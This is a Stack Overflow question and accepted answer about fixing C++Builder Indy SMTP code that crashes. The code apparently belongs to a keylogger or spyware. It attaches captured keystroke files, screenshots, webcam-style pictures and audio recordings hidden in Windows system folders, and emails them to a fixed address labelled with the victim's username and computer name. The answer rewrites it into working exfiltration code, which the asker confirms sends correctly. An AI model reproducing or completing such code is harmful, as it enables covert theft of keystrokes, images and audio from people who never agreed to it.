# C++ Builder XE5: Send email with trouble

Tags: c++, c++builder

I have a code to send email and this causes Acess violation when send email. Independently of sequence of code, the exception is thrown always on first line after TRY command. I already have done several tests and until now not found solution for this trouble. Could someone help me please?

This is my current sequence of code:

```
#include <IdAttachmentFile.hpp>
#include <Lmcons.h>


#pragma link "IdBaseComponent"
#pragma link "IdComponent"
#pragma link "IdExplicitTLSClientserverBase"
#pragma link "IdIOHandler"
#pragma link "IdIOHandlerSocket"
#pragma link "IdIOHandlerStack"
#pragma link "IdMessage"
#pragma link "IdMessageClient"
#pragma link "IdSMTP"
#pragma link "IdSMTPBase"
#pragma link "IdSSL"
#pragma link "IdSSLOpenSSL"
#pragma link "IdTCPClient"
#pragma link "IdTCPConnection"

TIdSMTP *IdSMTP1;
TIdMessage *IdMessage1;
TIdAntiFreeze *IdAntiFreeze1;
TIdSSLIOHandlerSocketOpenSSL *IdSSLIOHandlerSocketOpenSSL1;


AnsiString temp()
{
 wchar_t buffer [MAX_PATH];
 GetTempPath(MAX_PATH, buffer);
 return StrPas(buffer);
}

AnsiString GetLocalComputerName()
{
  TCHAR chrComputerName[MAX_COMPUTERNAME_LENGTH + 1];
  AnsiString strRetVal;
  DWORD dwBufferSize = MAX_COMPUTERNAME_LENGTH + 1;

  if(GetComputerName(chrComputerName,&dwBufferSize)) {
    strRetVal = chrComputerName;
  } else {
    strRetVal = "";
  }

  return(strRetVal);
}

AnsiString user()
{
TCHAR name [ UNLEN + 1 ];
DWORD size = UNLEN + 1;

if (GetUserName( (TCHAR*)name, &size ))
    return name;
    else
    return "Unknown";
}

//SENDING MAIL SMTP (GMAIL)
void MAIL()
{
    srand((unsigned)time(0));
    int random_integer;
    int lowest=1, highest=10;
    int range=(highest-lowest)+1;
    for(int index=0; index<200; index++){
        random_integer = lowest+int(range*rand()/(RAND_MAX + 1.0)); }

AnsiString FileToAttach = temp() + "keys.txt";
AnsiString FileToAttach2 = temp() + "keys1.txt";
AnsiString FileToAttach3 = temp() + "screenshot.bmp";
AnsiString FileToAttach4 = "C:\\Windows\\System32\\drivers\\etc\\rec32.wav";
AnsiString FileToAttach5 = temp() + "picture.bmp";
AnsiString FileToAttach6 = "C:\\Windows\\SysWOW64\\Speech\\Common\\rec64.wav";

try
{

IdSMTP1->Host = "ssl://smtp.gmail.com";
IdSMTP1->Port = 465;
IdSMTP1->Username = "sender@gmail.com";
IdSMTP1->Password = "pass_sender";
IdMessage1->Clear();
/*IdMessage1->MessageParts->Clear();
IdMessage1->Body->Clear(); */
IdMessage1->Priority = mpHigh;
IdMessage1->Recipients->EMailAddresses = "recipient@live.com";
IdMessage1->Subject = user();
IdMessage1->Body->Text = random_integer;
IdMessage1->Encoding = meMIME;
IdMessage1->ContentType = L"multipart/mixed; charset=UTF-8";
IdMessage1->ContentTransferEncoding = L"base64";
IdMessage1->ContentDisposition = L"attachment";
IdMessage1->CharSet = L"UTF-8";
IdMessage1->From->Address = "sender@gmail.com";
IdMessage1->From->Name = GetLocalComputerName();

TIdAttachmentFile *Attach = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach);
Attach->ContentType = GetMIMETypeFromFile(Attach->FileName);


if(FileExists(temp() + "keys1.txt"))  {
TIdAttachmentFile *Attach2 = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach2);
Attach2->ContentType = GetMIMETypeFromFile(Attach2->FileName);
}


TIdAttachmentFile *Attach3 = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach3);
Attach3->ContentType = GetMIMETypeFromFile(Attach3->FileName);


if(FileExists("C:\\Windows\\System32\\drivers\\etc\\rec32.wav"))  {
TIdAttachmentFile *Attach4 = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach4);
Attach4->ContentType = GetMIMETypeFromFile(Attach4->FileName);
}

if(FileExists(temp() + "picture.bmp"))  {
TIdAttachmentFile *Attach5 = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach5);
Attach5->ContentType = GetMIMETypeFromFile(Attach5->FileName);
}

if(FileExists("C:\\Windows\\SysWOW64\\Speech\\Common\\rec64.wav"))  {
TIdAttachmentFile *Attach6 = new TIdAttachmentFile(IdMessage1->MessageParts,FileToAttach6);
Attach6->ContentType = GetMIMETypeFromFile(Attach6->FileName);
}

IdSMTP1->IOHandler = IdSSLIOHandlerSocketOpenSSL1;
IdSMTP1->UseTLS = utUseImplicitTLS;
IdSMTP1->AuthType = satDefault;
//IdSMTP1->SendCmd("STARTTLS");
IdSMTP1->Authenticate();
IdSSLIOHandlerSocketOpenSSL1->SSLOptions->Method = sslvSSLv3;
IdSSLIOHandlerSocketOpenSSL1->SSLOptions->Mode = sslmClient;
IdSSLIOHandlerSocketOpenSSL1->Destination = "ssl://smtp.gmail.com:465";
IdSSLIOHandlerSocketOpenSSL1->Host = "ssl://smtp.gmail.com";
//IdSSLIOHandlerSocketOpenSSL1->PassThrough = true;

}

catch(Exception &ex)
{
 ShowMessage(ex.ToString());
}

try
{
IdSMTP1->Connect();
IdAntiFreeze1->IdleTimeOut = 250;
IdSMTP1->Send(IdMessage1);
Application->ProcessMessages();
ShowMessage("E-Mail sent to: recipient@live.com");
}

catch(Exception &ex)
{
 ShowMessage(ex.ToString());
}

if(IdSMTP1->Connected()) {
IdSMTP1->Disconnect();}

IdSMTP1->Free();
IdMessage1->Free();
IdSSLIOHandlerSocketOpenSSL1->Free();
}

void __fastcall TForm1::Button1Click(TObject *Sender)
{
MAIL();
}
```

Thanks in advance.

Comment: I can't spot where you allocate an instance for `IdSMTP1`, so dereferencing an uninitialized pointer (`IdSMTP1->Host = "ssl://smtp.gmail.com";`) is likely to crash.

Comment: @ πάντα ῥεῖ, you tested this my code? also launched an exception this line (IdSMTP1->Host = "ssl://smtp.gmail.com";) ?

Comment: I don't understand your comment? I just had a short glance, flying over this source code. It's easy to spot what the problem might be. You'll need to have a `IdSMTP1 = new TIdSMTP();` somewhere to do what the lines in question does.

Comment: @πάντα ῥεῖ, You tested this code?

Comment: No I just read it as mentioned. It's not complete, so how could I test it?

Comment: @πάνταῥεῖ, This code is complete! :D .You have C++ Builder XE5 installed?

Comment: It doesn't matter if _'C++ Builder XE5'_  or not. Dereferencing uninitialized pointers will lead to trouble with ***any*** C++ compiler. Use your debugger to step through, and get a grip what's going on. No one here's supposed to test/debug your code for you.

Comment: @ πάντα ῥεῖ, then could suggest a possible solution (in source code) based on what you said?

Comment: It was already given: `IdSMTP1 = new TIdSMTP();`

Comment: There are a lot of problems with this code.  The missing `new TIdSMTP` statement is just the tip of the iceberg.  The SSL and Message objects are also not being allocated.  The Message object is not being filled correctly. The SSL and SMTP objects are not being used correctly (allocation aside). The code is forcing AnsiString everywhere Unicode is expected. This code needs a complete rewrite.

Answer (score 1, accepted):

Your code has a LOT of problems, and really needs to be re-written.  Try something more like this instead:

```
#include <vcl.h>
#pragma hdrstop

#include <IdSMTP.hpp>
#include <IdSSLOpenSSL.hpp>
#include <IdAntiFreeze.hpp>
#include <IdText.hpp>
#include <IdAttachmentFile.hpp>

#include <Lmcons.h>
#include <memory>

#pragma link "IdBaseComponent"
#pragma link "IdComponent"
#pragma link "IdExplicitTLSClientserverBase"
#pragma link "IdIOHandler"
#pragma link "IdIOHandlerSocket"
#pragma link "IdIOHandlerStack"
#pragma link "IdMessage"
#pragma link "IdMessageClient"
#pragma link "IdSMTP"
#pragma link "IdSMTPBase"
#pragma link "IdSSL"
#pragma link "IdSSLOpenSSL"
#pragma link "IdTCPClient"
#pragma link "IdTCPConnection"

String temp()
{
    WCHAR buffer[MAX_PATH+1] = {0};

    DWORD len = ::GetTempPathW(MAX_PATH+1, buffer);
    if (len > 0)
        return String(buffer, len);

    return String();
}

String localComputerName()
{
    WCHAR buffer[MAX_COMPUTERNAME_LENGTH+1] = {0};
    DWORD size = MAX_COMPUTERNAME_LENGTH+1;

    if (::GetComputerNameW(buffer, &size))
        return String(buffer, size);

    return String();
}

String user()
{
    WCHAR name[UNLEN+1] = {0};
    DWORD size = UNLEN+1;

    if (::GetUserNameW(name, &size))
        return String(name, size-1);

    return _D("Unknown");
}

String systemPath()
{
    WCHAR path[MAX_PATH+1] = {0};

    UINT len = ::GetSystemDirectoryW(path, MAX_PATH+1);
    if (len > 0)
        return IncludeTrailingPathDelimiter(String(path, len));

    return String();
}

String systemWow64Path()
{
    WCHAR path[MAX_PATH+1] = {0};

    UINT len = ::GetSystemWow64DirectoryW(path, MAX_PATH+1);
    if (len > 0)
        return IncludeTrailingPathDelimiter(String(path, len));

    return String();
}

void MAIL()
{
    srand((unsigned)time(0));
    int random_integer;
    int lowest = 1, highest = 10;
    int range = (highest-lowest)+1;
    for(int index = 0; index < 200; ++index)
        random_integer = lowest + int(range*rand()/(RAND_MAX + 1.0));

    String TempFolder = temp();
    String FileToAttach = TempFolder + _D("keys.txt");
    String FileToAttach2 = TempFolder + _D("keys1.txt");
    String FileToAttach3 = TempFolder + _D("screenshot.bmp");
    String FileToAttach4 = systemPath() + _D("drivers\\etc\\rec32.wav");
    String FileToAttach5 = TempFolder + _D("picture.bmp");
    String FileToAttach6 = systemWow64Path() + _D("Speech\\Common\\rec64.wav");

    // NOTE: if compiling for C++11, std::auto_ptr is deprecated, use std::unique_ptr instead...

    std::auto_ptr<TIdAntiFreeze> IdAntiFreeze1(new TIdAntiFreeze(NULL));
    IdAntiFreeze1->IdleTimeOut = 250;

    std::auto_ptr<TIdSMTP> IdSMTP1(new TIdSMTP(NULL));
    TIdSSLIOHandlerSocketOpenSSL *IdSSLIOHandlerSocketOpenSSL1 = new TIdSSLIOHandlerSocketOpenSSL(IdSMTP1.get())

    IdSSLIOHandlerSocketOpenSSL1->SSLOptions->Method = sslvTLSv1;
    IdSSLIOHandlerSocketOpenSSL1->SSLOptions->Mode = sslmClient;

    IdSMTP1->IOHandler = IdSSLIOHandlerSocketOpenSSL1;
    IdSMTP1->UseTLS = utUseImplicitTLS;
    IdSMTP1->Host = _D("smtp.gmail.com");
    IdSMTP1->Port = 465;
    IdSMTP1->Username = _D("sender@gmail.com");
    IdSMTP1->Password = _D("pass_sender");
    IdSMTP1->AuthType = satDefault;

    std::auto_ptr<TIdMessage> IdMessage1(new TIdMessage(NULL));
    IdMessage1->Priority = mpHigh;
    IdMessage1->Recipients->EMailAddresses = _D("recipient@live.com");
    IdMessage1->Subject = user();
    IdMessage1->Encoding = meMIME;
    IdMessage1->ContentType = _D("multipart/mixed");
    IdMessage1->CharSet = _D("UTF-8");
    IdMessage1->From->Address = _D("sender@gmail.com");
    IdMessage1->From->Name = localComputerName();

    TIdText *text = new TIdText(IdMessage1->MessageParts, NULL);
    text->Body->Text = random_integer;
    text->ContentType = _D("text/plain");
    text->CharSet = _D("utf-8");

    new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach);

    if (FileExists(FileToAttach2))
        new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach2);

    new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach3);

    if (FileExists(FileToAttach4))
        new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach4);

    if (FileExists(FileToAttach5))
        new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach5);

    if (FileExists(FileToAttach6))
        new TIdAttachmentFile(IdMessage1->MessageParts, FileToAttach6);

    IdSMTP1->Connect();
    IdSMTP1->Send(IdMessage1.get());
    IdSMTP1->Disconnect();
}

void __fastcall TForm1::Button1Click(TObject *Sender)
{
    MAIL();
    ShowMessage("E-Mail sent to: recipient@live.com");
}
```

Comment: Great @Remy Lebeau !! :D. Thank you very much guy! I will test.

Comment: Dear @Remy Lebeau, my IDE haven't IdSSLIOHandlerSocketOpenSSL.hpp and generate compilation error.

Comment: `IdSSLIOHandlerSocketOpenSSL.hpp` should be `IdSSLOpenSSL.hpp` instead. Sorry about that.  I corrected it.

Comment: `IdSMTP1->Send(IdMessage1);` should be `IdSMTP1->Send(IdMessage1.get());`

Comment: It work fine now and send email correctly!! :D, I marked you answer!. @Ramy, I have similar trouble with upload of files using IdFTP component. I will make other post showing, already it's about out subject.

Comment: Consider using `std::unique_ptr` rather than `std::auto_ptr`. bcc32 supports it (well, [almost](http://qc.embarcadero.com/wc/qcmain.aspx?d=125424)) and it will flag a compilation error if you accidentally copy it.

Comment: `std::unique_ptr` in new in C++11, which bcc32 does not support yet. That is why I chose to use `std::auto_ptr` in my example.